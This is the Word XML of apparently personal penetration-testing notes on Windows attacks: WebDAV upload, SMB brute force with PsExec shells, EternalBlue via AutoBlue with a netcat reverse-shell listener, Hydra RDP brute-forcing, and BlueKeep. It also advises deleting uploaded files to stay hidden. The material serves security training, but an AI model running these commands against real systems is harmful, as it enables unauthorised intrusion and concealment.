      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A58DD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etasploit has its own built in IIS WebDAV ASP file upload module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A400A76"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xploit/windows/iis/iis_webdav_upload_asp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE2D08"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eed to specify PATH for desired .asp pass on webdav server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07724F6C"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HttpUsername and HttpPassword is required for this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D8899"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ake sure to delete any files that you have uploaded in a Pen Test to prevent visibility of your actions and stay hidden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E2F6B" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547E13E8"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Exploiting SMB with PsExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE84AD"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MB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals (printers and serial ports) between computers on a local network (LAN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C488B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MB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD79D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AMBA is the open source Linux implementation of SMB, and allows Windows systems to access Linux shares and devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F92BFD" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471969CB"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SMB Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC6544" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C5B75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SMB protocol utilizes two levels of authentication, namely:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29179C69"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er Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D84223"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hare Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DF1F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er Authentication – Users must provide a username and password to authenticate with the SMB server to access a share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE83B8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hare Authentication – Users must provide a password to access a restricted share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344005EE"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ote that both authentication levels utilize a challenge response authentication system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730402C" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311AA11E" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A3BA29"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Authentication Request (Client-Server)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>Encrypt string with user’s hash (Server-Client)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>Encrypted string (Client-Server)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>Access Granted, Check if the string matches the client’s string (Server-Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529B4EC" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0EAF81"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PsExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6FC5AD"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sExec is a lightweight telnet-replacement developed by Microsoft that allows you to execute processes on remote windows systems using any user’s credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF413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sExec authentication is performed via SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775736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e can use the PsExec utility to authenticate with the target system legitimately and run arbitrary commands or launch a remote command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD93ED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t is very similar to RDP, however, instead of controlling the remote system via GUI, commands are sent via CMD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D7547" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429932A2"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 In order to utilize PsExec to gain access to a Windows target, we will need to identify legitimate user accounts and their respective password or password hashes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ This can be done by leveraging various tools and techniques; however, the most common technique will involve performing an SMB login-brute force attack.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ We can narrow down our brute-force attack to only include common Windows user accounts like:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>* Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ After we have obtained a legitimate user account and password, we can use the credentials to authenticate with the target system via PsExec and execute arbitrary system commands or obtain a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3844D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tart postgresql service along with msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB60410"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auxiliary/scanner/smb/smb_login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C69B6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HOSTS, SMBDomain (use for authentication if necessary), USER_FILE, USER_PASS, STOP_ON_SUCCESS, VERBOSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43893D"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psexec.py is a great Python script that is used to execute .exe files (which cannot be executed on Linux machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4E16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ype “pse” and autocomplete with Tab, could also just find it on a GitHub repo if that doesn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078BFA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sexec.py (USER)@(HOST) cmd.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C63B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ll prompt a user logon based on the User provided, afterwards it will grant a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69863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xploit/windows/smb/psexec” will provide with a meterpreter session, but it will also utilize a malicious payload (BE WEARY OF THIS) (need to set SMBUser/SMBPass/LHOST/LPORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4E0088" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44774F7A" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3030CEA4"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EternalBlue – MS17-010 – SMB Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7442D1" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1634329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ternalBlue is the name given to a collection of Windows vulnerabilities and exploits that allows attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B852BC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xploit originally developed by the NSA and leaked to the public by the Shadow Brokers in 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EECA31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akes advantage of SMBv1 protocol that allows attackers to send a specially crafted packets that consequently facilitate the execution of arbitrary commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738AB1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ll automatically elevate privileges, no need for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408DBE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tilized in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E86C5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vulnerability affects multiple versions of Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990BCB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Vista</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3948A"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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86527E"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Server 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521775E0"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8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691204DD"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Server 2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351811A"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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2B517"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Server 2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679E38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icrosoft released a patch for this in March of 2017, however many companies have still not yet patched their systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AD0BD"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MSF auxiliary module that can be used to check if a target system is vulnerable to the exploit and has an exploit module that can be used to exploit the vulnerable Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6D7EC" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MANUAL EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F565CEA" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00420090" w:rsidP="00B1380B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00B1380B" w:rsidRPr="00B1380B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-US"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://github.com/3ndG4me/AutoBlue-MS17-010</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F37513A"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e the README.md to understand how to use the exploit, the execution is self-explanatory, (make LPORT 1234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833FE34"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hellcode/shellprep.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABEC87"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t up netcat listener “nc -nvlp 1234”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079DD68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ternalblue_exploit(HOST VER #).py (make sure to make to chmod +x this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3AD613"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ython eternalblue_exploit(HOST VER #).py (HOST) shellcode/(GENERATED SHELLCODE FROM SHELL PREP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65336E1E"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etcat listener should bounce back at command shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01145F3A"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nmap -sV -p 445 –script=smb-vuln-ms17-010 (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0595DDE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ll check if the host is vulnerable to the EternalBlue exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616DE837"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auxiliary/scanner/smb/smb_ms17_010”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072656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exploit/windows/smb/ms17_010_eternalblue”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8C55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canner module and exploit module for automatic MS17-010 exploitation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A822F5" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0551BDE4"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RDP – Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE7FBD" w14:textId="4CFF4E26"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Proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A73A1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DP uses TCP port 3389, however it can be configured to run on any other TCP port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B982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DP requires a legitimate user account and password on the target system for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB92BA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DP is brute-forcible to identify user credentials that we can use to gain remote access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC2F1C"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ince RDP can be configured to run on other ports, it can be hidden and NMAP may not be able to identify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69381AD0"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uxiliary/scanner/rdp/rdp_scanner” can get around this to identify if that port is running RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28698F0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Just need to set RHOSTS and RPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749FF359" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3747A34E" w14:textId="6728486E"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n utilize Hydra for RDP brute-</w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>forcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250B87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hydra -L (USER LIST) -P (PASS LIST) rdp://(IP/DOMAIN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC23C05"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Hydra will utilize the default RDP port (3389), you can use “-s (PORT)” to specify the port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8576E4" w14:textId="4678ADC5"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t (TASK AMOUNT)” will limit the </w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> of tasks to reduce noise on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2ED208" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453C6881"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xFreeRDP – Connect to RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981F06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xfreerdp /u:(USER) /p:(PASS) /v:(HOST):(PORT if necessary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0B3ED" w14:textId="77777777" w:rsid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Will open an RDP session on the attacking machine, GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6723BA" w14:textId="77777777" w:rsidR="00D611D1" w:rsidRDefault="00D611D1" w:rsidP="00D611D1">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35463CC8" w14:textId="02CB34A5" w:rsidR="00D611D1" w:rsidRDefault="00E762E0" w:rsidP="00D611D1">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>BlueKeep – CVE-2019-0708 – BlueKeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A509BDD" w14:textId="77777777" w:rsidR="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00D611D1">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FB65BA" w14:textId="4884815E" w:rsidR="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00E762E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BlueKeep is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77906280" w14:textId="474AE29D" w:rsidR="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00E762E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Microsoft, May 2019 (made public</w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, MSFT patch released on May 14</w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE" w:rsidRPr="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="009A7EAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, 2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2271E14F" w14:textId="17E858C7" w:rsidR="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00E762E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Takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to a chunk of kernel memory allowing them to remotely execute arbitrary code without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019BD260" w14:textId="46ABC512" w:rsidR="00E762E0" w:rsidRDefault="00E762E0" w:rsidP="00E762E0">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Everything committed in the kernel space will be executed at the highest level of authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25C7B4" w14:textId="40F97952" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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At the time of discovery, about 1 million systems worldwide were found to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23139C" w14:textId="402E31FB" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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Exploitable machines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DABEBD" w14:textId="66FF821D" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D912E37" w14:textId="1CE3C1F6" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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Vista</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B42A49E" w14:textId="4D2E3589" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29DFCD" w14:textId="59A3243C" w:rsidR="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">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Windows Server 2008 &amp; R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5361C4" w14:textId="7C5F5844" w:rsidR="009A7EAE" w:rsidRPr="009A7EAE" w:rsidRDefault="009A7EAE" w:rsidP="009A7EAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
